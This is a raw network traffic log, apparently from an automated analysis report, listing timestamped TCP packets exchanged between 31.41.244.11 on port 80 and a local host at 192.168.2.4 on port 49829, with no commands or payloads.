                                                                                                                                                                                              Dec 16, 2024 01:01:35.585761070 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.585805893 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.585854053 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.585890055 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.588660955 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.588748932 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.588923931 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.588964939 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.591695070 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.591784954 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.591871023 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.591903925 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.594633102 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.594676971 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.594769955 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.594810009 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.597634077 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.597743988 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.597789049 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.600657940 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.600720882 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.600737095 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.600781918 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.603621006 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.603667021 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.603727102 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.603853941 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.606631041 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.606682062 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.606750011 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.606797934 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.609599113 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.609673023 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.609766006 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.609848976 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.612627983 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.612678051 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.612745047 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.612795115 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.615638971 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.615689993 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.615732908 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.615775108 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.618596077 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.618654966 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.618711948 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.618762970 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.621546984 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.621655941 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.621697903 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.624577045 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.624631882 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.624677896 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.624727011 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.627537966 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.627582073 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.627635956 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.627912998 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.630515099 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.630570889 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.630645990 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.630692005 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.633543015 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.633590937 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.633614063 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.633657932 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.636497021 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.636545897 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.636619091 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.636662006 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.639527082 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.639580011 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.640645027 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.640702963 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.642520905 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.642571926 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.642652988 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.642703056 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.645483971 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.645535946 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.645603895 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.645653963 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.648680925 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.648727894 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.648741961 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.648773909 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.651398897 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.651462078 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.651489019 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.651539087 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.654175997 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.654232979 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.654299021 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.654345989 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.656737089 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.656784058 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.656831980 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.656878948 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.659589052 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.659615040 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.659636974 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.659658909 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.662029982 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.662075043 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.662125111 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.662173033 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.664566994 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.664617062 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.664621115 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.664669991 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.666964054 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.667012930 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.667059898 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.667107105 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.669415951 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.669466972 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.669521093 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.669568062 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.671808004 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.671853065 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.671931982 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.671978951 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.674151897 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.674199104 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.674263954 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.674309969 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.676532030 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.676575899 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.676614046 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.676660061 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.678803921 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.678857088 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.678925037 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.678977013 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.681085110 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.681137085 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.681181908 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.681230068 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.683377028 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.683429003 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.683476925 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.683526993 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.685662031 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.685715914 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.685816050 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.685866117 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.687865973 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.687918901 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.687963963 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.688014984 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.690159082 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.690211058 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.690320015 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.690372944 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.692435026 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.692487001 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.692557096 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.692605972 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.693627119 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.693676949 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.693742990 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.693790913 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.694812059 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.694863081 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.694927931 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.694978952 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.696017027 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.696068048 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.696135998 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.696187019 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.697223902 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.697277069 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.697335958 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.697387934 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.698432922 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.698482990 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.698550940 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.698600054 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.699615002 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.699671030 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.699736118 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.699784994 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.700767994 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.700819016 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.700884104 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.700932980 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.701977968 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.702029943 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.702120066 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.702172041 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.703147888 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.703202963 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.703310013 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.703389883 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.704339027 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.704395056 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.704492092 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.704549074 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.705477953 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.705535889 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.705554008 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.705612898 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.706653118 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.706703901 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.706729889 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.706783056 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.707813978 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.707864046 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.707963943 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.708014965 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.708894014 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.708944082 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.709009886 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.709060907 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.710068941 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.710125923 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.710207939 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.710259914 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.711201906 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.711261988 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.711345911 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.711399078 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.712361097 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.712412119 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.712481022 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.712534904 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.713469028 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.713521004 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.713584900 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.713635921 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.714584112 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.714633942 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.714699030 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.714746952 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.715739012 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.715790987 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.715863943 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.715914965 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.716876030 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.716929913 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.717004061 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.717053890 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.718035936 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.718091965 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.718128920 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.718180895 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.719093084 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.719142914 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.719209909 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.719259977 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.720227957 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.720279932 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.720321894 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.720372915 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.721354961 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.721405983 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.721472025 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.721523046 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.722467899 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.722517014 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.722584963 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.722635031 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.723597050 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.723647118 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.723727942 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.723778009 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.724724054 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.724790096 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.724828005 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.724878073 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.725843906 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.725967884 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.725971937 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.726020098 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.726948977 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.726999998 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.727081060 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.727138042 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.728116035 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.728167057 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.728171110 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.728219986 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.729223967 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.729271889 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.729329109 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.729410887 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.730335951 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.730386019 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.730465889 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.730555058 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.731467962 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.731518984 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.731652975 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.731703997 CET4982980192.168.2.431.41.244.11
